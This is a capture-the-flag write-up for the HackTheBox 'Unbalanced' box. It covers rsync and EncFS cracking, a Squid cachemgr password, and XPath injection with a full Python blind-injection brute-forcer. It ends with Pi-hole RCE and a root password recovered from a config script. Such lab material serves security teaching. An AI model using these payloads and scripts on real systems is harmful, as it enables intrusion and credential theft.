Summary

Unbalanced is a Linux, hard box is a created by polarbearer & GibParadox. Initial Enumeration was finding and download EncFS folder, and cracking that and opening the squid.conf and getting the squid password to look at Fully qualified domain name cache which gave us few IPs. Looking on those we found XPATH injection on removed IP from load-balancer.
Using the injection we can find some usernames and again using Blind injection we can crack the password. Which give us access to ssh Enumerating we find pi-hole running. Exploiting that we get a shell as www-data which have access to docker root which have few scripts and one of them contained root password. using which we get root.

Enumeration

nmap

# Nmap 7.80 scan initiated Wed Sep 23 21:57:36 2020 as: nmap -sC -sV -Pn -oN nmap/unbalanced 10.10.10.200
Nmap scan report for 10.10.10.200
Host is up (0.081s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 23 21:57:52 2020 -- 1 IP address (1 host up) scanned in 16.67 seconds

Which show us ssh rsync and squid proxy is running on the box.

Lets start with rsync enumeration.

Rsync

I used hacktricks article to enumerate rsync

we see we have a

conf_backups    EncFS-encrypted configuration backups

Share

Downloading that we get the EncFS-encrypted backup

rsync -av rsync://10.10.10.200:873/conf_backups loot/rsync

Googling around to crack EncFS file-system we see an article
following that we can break the password for the encFS

Cracking the password we get the password as bubblegum

encfsctl export rsync decrypt
EncFS Password:
directory decrypt does not exist.
The directory "decrypt" does not exist. Should it be created? (y,N) y

Using the above command i exported all files from the encFS folder

We know we have squid also open so lets check its conf

Squid-Proxy

Looking into that we find a password as Thah$Sh1 and a hostname as intranet.unbalanced.htb

cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events

I used foxy-proxy to use the squid proxy

Web

Enumerating the web page we find employee.xml

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://intranet.unbalanced.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/wfuzz/general/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] Proxy:          http://10.10.10.200:3128
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,conf,php,xml
[+] Timeout:        10s
===============================================================
2020/09/24 09:38:23 Starting gobuster
===============================================================
/css (Status: 301)
/employees.xml (Status: 403)
/index.php (Status: 302)
/intranet.php (Status: 200)
===============================================================
2020/09/24 09:39:02 Finished
===============================================================

which made me thinking for an possibility of XPATH injection trying that we were unsuccessful.

fqdncache

Lets look at the fqdncache(Fully qualified domain name cache)

shows us more intranet hosts.

checking 172.31.179.2 172.31.179.3 we see the same response.

Seeing those two IPs made me think for a possibility of 172.31.179.1.

Running gobuster again we see the same

Except 200 response on index.php

Visiting that and checking

Okay this is interesting

Host temporarily taken out of load balancing for security maintenance.

checking same intranet route we see the same page.

Trying XPATH injection on this give us a some data as usernames

payload

' or '1'='1

based on the role i thought of getting passwords for bryan and sarah.

#!/usr/bin/python3

import requests

PROXY="http://10.10.10.200:3128"
URL="http://172.31.179.1/intranet.php"

usernames =['bryan','sarah']

letters="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&()*+,-./:;<=>?@[\]^_{|}~"

def makeRequest(username,password):
    payload = {"Username":username,"Password":password}
    response = requests.post(URL,data=payload,proxies={"http":PROXY})
    return response.text


invalidLength = len(makeRequest("hello","hello"))
print("[*] Got Invalid Length as "+str(invalidLength))
# Brute
for user in usernames:
    password = ''
    print('Attemping User :',user)
    for i in range(1,80):
        found=False
        for l in letters:
            payload = "' or Username ='"+user+"' and substring(Password,"+str(i)+",1)='"+l
            response = makeRequest('',payload)
            if len(response) != invalidLength:
                found=True
                break
        if not found:
            break
        print('[+] Found character: {}'.format(l))
        password += l
    print("Username: {} Password: {}".format(user,password))

Which get us the credentials.

bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah

User

using bryan credentials we can ssh to the box.

looking in the home direcory we find TODO

############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

Knowing the default port for pi-hole web is 8080. I tried to curl it

curl http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>

But that gave me error.

Checking linpeas output

we see a host as 172.31.11.3

we find pi-hole is running on

curl http://172.31.11.3:80

   <html><head>
       <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
       <link rel='stylesheet' href='/pihole/blockingpage.css' type='text/css'/>
   </head><body id='splashpage'><img src='/admin/img/logo.svg'/><br/>Pi-<b>hole</b>: Your black hole for Internet advertisements<br><a href='/admin'>Did you mean to go to the admin panel?</a></body></html>

Lets port forward it and check it in browser

we see the version to be 4.3.2

Checking searchsploit we see it have an RCE.

So now we need a password for pi-hole. Going back to the todo we see they set an temporary password so i tried common password admin and boom we are in

so using the exploit 48727 we can get a shell as www-data

www-data

With that we get a shell as www-data

going to / we see we can enter /root

Checking pihole_config.sh

www-data@pihole:/root$ cat pihole_config.sh
cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb

We get a password as bUbBl3gUm$43v3Ry0n3! checking the password with su on ssh shell we see we can su to root

Root

and we can grab root.txt

and we have pwned Unbalanced 💃